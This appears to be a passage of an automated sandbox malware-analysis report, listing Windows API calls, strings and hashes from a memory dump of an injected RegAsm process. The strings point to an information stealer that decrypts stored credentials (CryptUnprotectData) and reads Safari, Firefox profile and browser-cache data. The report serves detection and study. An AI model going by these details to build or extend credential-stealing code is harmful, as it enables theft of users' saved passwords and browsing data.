                                                                                                                                                                                                  • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                                    • Part of subcall function 004062A6: SetFilePointerEx.KERNEL32(0040627C,?,?,00000000,00000000), ref: 004062C2
                                                                                                                                                                                                  • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,?,00000000,0040627C), ref: 00406942
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ??2@FilePointermemcpy
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 609303285-0
                                                                                                                                                                                                  • Opcode ID: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                                                                                                                                                                                  • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                                                                                                                                                                                                  • Opcode Fuzzy Hash: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _wcsicmp
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2081463915-0
                                                                                                                                                                                                  • Opcode ID: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                                                                                                                                                  • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF), ref: 0040629C
                                                                                                                                                                                                    • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                                                                                                                                                    • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: File$CloseCreateErrorHandleLastRead
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2136311172-0
                                                                                                                                                                                                  • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                                                                                                  • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ??2@??3@
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1936579350-0
                                                                                                                                                                                                  • Opcode ID: c1d2223be94a68f833538aabce888aab0279aa93460cd9bacb51074fa57d6133
                                                                                                                                                                                                  • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c1d2223be94a68f833538aabce888aab0279aa93460cd9bacb51074fa57d6133
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: free
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                                                                                  • Opcode ID: 003685cf356b02fbbab95fb8d76c74631070c0c773c27bafbcebbee0aa56b295
                                                                                                                                                                                                  • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 003685cf356b02fbbab95fb8d76c74631070c0c773c27bafbcebbee0aa56b295
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: free
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                                                                                  • Opcode ID: 196381b9ffc9c4816d42631a332da68c1e878a4277d624e181b366dd14fec77a
                                                                                                                                                                                                  • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 196381b9ffc9c4816d42631a332da68c1e878a4277d624e181b366dd14fec77a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: free
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                                                                                  • Opcode ID: 6cd4ef4cc40bf5a7540e7e9c88dd58f61d837874a50d1d7f714cafdae955675f
                                                                                                                                                                                                  • Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6cd4ef4cc40bf5a7540e7e9c88dd58f61d837874a50d1d7f714cafdae955675f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 004182D7
                                                                                                                                                                                                    • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                                  • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                                                                                                                                                  • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                                                                                                                                                  • LocalFree.KERNEL32(?), ref: 00418342
                                                                                                                                                                                                  • free.MSVCRT ref: 00418370
                                                                                                                                                                                                    • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,756F18FE,?,0041755F,?), ref: 00417452
                                                                                                                                                                                                    • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                                                                                                                                                                  • String ID: OsError 0x%x (%u)
• API String ID: 2360000266-2664311388
• Opcode ID: 7a793c3aafbc7d353b0e578237d4b483da7e71834841705644cfc2f7eabd6d8e
• Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
• Opcode Fuzzy Hash: 7a793c3aafbc7d353b0e578237d4b483da7e71834841705644cfc2f7eabd6d8e
• Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
APIs
• _wcsicmp.MSVCRT ref: 004022A6
• _wcsicmp.MSVCRT ref: 004022D7
• _wcsicmp.MSVCRT ref: 00402305
• _wcsicmp.MSVCRT ref: 00402333
  • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
  • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
• memset.MSVCRT ref: 0040265F
• memcpy.MSVCRT(?,?,00000011), ref: 0040269B
  • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
  • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
• memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
• LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
• FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
Strings
Memory Dump Source
• Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
Similarity
• API ID: _wcsicmp$Freememcpy$Library$CryptDataLocalUnprotectmemsetwcslen
• String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
• API String ID: 2257402768-1134094380
• Opcode ID: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
• Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
• Opcode Fuzzy Hash: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
• Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
APIs
• GetDlgItem.USER32(?,000003E9), ref: 0041402F
• GetDlgItem.USER32(?,000003E8), ref: 0041403B
• GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
• GetWindowLongW.USER32(?,000000F0), ref: 00414056
• GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
• GetWindowLongW.USER32(?,000000EC), ref: 0041406B
• GetWindowRect.USER32(00000000,?), ref: 0041407D
• GetWindowRect.USER32(?,?), ref: 00414088
• MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
• MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
• GetDC.USER32 ref: 004140E3
• wcslen.MSVCRT ref: 00414123
• GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
• ReleaseDC.USER32(?,?), ref: 00414181
• _snwprintf.MSVCRT ref: 00414244
• SetWindowTextW.USER32(?,?), ref: 00414258
• SetWindowTextW.USER32(?,00000000), ref: 00414276
• GetDlgItem.USER32(?,00000001), ref: 004142AC
• GetWindowRect.USER32(00000000,?), ref: 004142BC
• MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
• GetClientRect.USER32(?,?), ref: 004142E1
• GetWindowRect.USER32(?,?), ref: 004142EB
• SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
• GetClientRect.USER32(?,?), ref: 0041433B
• SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
Strings
Memory Dump Source
• Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
Similarity
• API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
• String ID: %s:$EDIT$STATIC
• API String ID: 2080319088-3046471546
• Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
• Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
• Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
• Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
APIs
• EndDialog.USER32(?,?), ref: 00413221
• GetDlgItem.USER32(?,000003EA), ref: 00413239
• SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
• SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
• SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
• memset.MSVCRT ref: 00413292
• memset.MSVCRT ref: 004132B4
• memset.MSVCRT ref: 004132CD
• memset.MSVCRT ref: 004132E1
• memset.MSVCRT ref: 004132FB
• memset.MSVCRT ref: 00413310
• GetCurrentProcess.KERNEL32 ref: 00413318
• ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
• ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
• memset.MSVCRT ref: 004133C0
• GetCurrentProcessId.KERNEL32 ref: 004133CE
• memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
• wcscpy.MSVCRT ref: 0041341F
• _snwprintf.MSVCRT ref: 0041348E
• SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
• GetDlgItem.USER32(?,000003EA), ref: 004134B0
• SetFocus.USER32(00000000), ref: 004134B7
Strings
• {Unknown}, xrefs: 004132A6
• Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
Memory Dump Source
• Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
Similarity
• API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
• String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
• API String ID: 4111938811-1819279800
• Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
• Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
• Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
• Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
APIs
• GetDlgItem.USER32(?,000003EC), ref: 004011F0
• ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
• GetDlgItem.USER32(?,000003EE), ref: 00401238
• ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
• GetDlgItem.USER32(?,000003EC), ref: 00401273
• ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
• GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
• LoadCursorW.USER32(00000000,00000067), ref: 00401297
• SetCursor.USER32(00000000), ref: 0040129E
• GetDlgItem.USER32(?,000003EE), ref: 004012BF
• ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
• GetDlgItem.USER32(?,000003EC), ref: 004012E6
• SetBkMode.GDI32(?,00000001), ref: 004012F2
• SetTextColor.GDI32(?,00C00000), ref: 00401300
• GetSysColorBrush.USER32(0000000F), ref: 00401308
• GetDlgItem.USER32(?,000003EE), ref: 00401329
• EndDialog.USER32(?,?), ref: 0040135E
• DeleteObject.GDI32(?), ref: 0040136A
• GetDlgItem.USER32(?,000003ED), ref: 0040138F
• ShowWindow.USER32(00000000), ref: 00401398
• GetDlgItem.USER32(?,000003EE), ref: 004013A4
• ShowWindow.USER32(00000000), ref: 004013A7
• SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
• SetWindowTextW.USER32(?,00000000), ref: 004013CA
• SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
• SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
Memory Dump Source
• Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
Similarity
• API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
• String ID:
• API String ID: 829165378-0
• Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
• Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
• Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • memset.MSVCRT ref: 00404172
                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                  • wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                                  • wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                                  • memset.MSVCRT ref: 00404200
                                                                                                                                                                                                  • memset.MSVCRT ref: 00404215
                                                                                                                                                                                                  • _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                                  • wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                                  • memset.MSVCRT ref: 0040426E
                                                                                                                                                                                                  • memset.MSVCRT ref: 004042CD
                                                                                                                                                                                                  • memset.MSVCRT ref: 004042E2
                                                                                                                                                                                                  • _snwprintf.MSVCRT ref: 004042FE
                                                                                                                                                                                                  • wcscpy.MSVCRT ref: 00404311
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                                                                                                                                                  • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                                                                                                                                                  • API String ID: 2454223109-1580313836
                                                                                                                                                                                                  • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                                                                                                                                  • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _snwprintf$memset$wcscpy
                                                                                                                                                                                                  • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                                                                                                  • API String ID: 2000436516-3842416460
                                                                                                                                                                                                  • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                                                                                                                  • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                                                                                    • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                                                                                  • free.MSVCRT ref: 0040E49A
                                                                                                                                                                                                    • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                                                                                  • memset.MSVCRT ref: 0040E380
                                                                                                                                                                                                    • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                                                                                                    • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                                                                                                                  • wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                                                                                  • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E3EC
                                                                                                                                                                                                  • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E407
                                                                                                                                                                                                  • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E422
                                                                                                                                                                                                  • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E43D
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                                                                                                                                                                  • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                                                                                                                                  • API String ID: 3849927982-2252543386
                                                                                                                                                                                                  • Opcode ID: 60a964cb735b7f2e388f13091a32ea25ff980dc40793d4a043d01af8ab6a7d2e
                                                                                                                                                                                                  • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 60a964cb735b7f2e388f13091a32ea25ff980dc40793d4a043d01af8ab6a7d2e
                                                                                                                                                                                                  • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • memset.MSVCRT ref: 004091E2
                                                                                                                                                                                                    • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                                                  • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                                                                                                                  • memcmp.MSVCRT ref: 004092D9
                                                                                                                                                                                                  • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                                                                                                                                                                  • memcmp.MSVCRT ref: 0040933B
                                                                                                                                                                                                  • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                                                                                                                                                                  • memcmp.MSVCRT ref: 00409411
                                                                                                                                                                                                  • memcmp.MSVCRT ref: 00409429
                                                                                                                                                                                                  • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                                                                                                                                                                  • memcmp.MSVCRT ref: 004094AC
                                                                                                                                                                                                  • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3715365532-3916222277
                                                                                                                                                                                                  • Opcode ID: a80c2ed2cd7725c5ba05b8bc3cd527f2b50e73a4ba521d2eda8c640b4e065994
                                                                                                                                                                                                  • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a80c2ed2cd7725c5ba05b8bc3cd527f2b50e73a4ba521d2eda8c640b4e065994
                                                                                                                                                                                                  • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59
                                                                                                                                                                                                  APIs
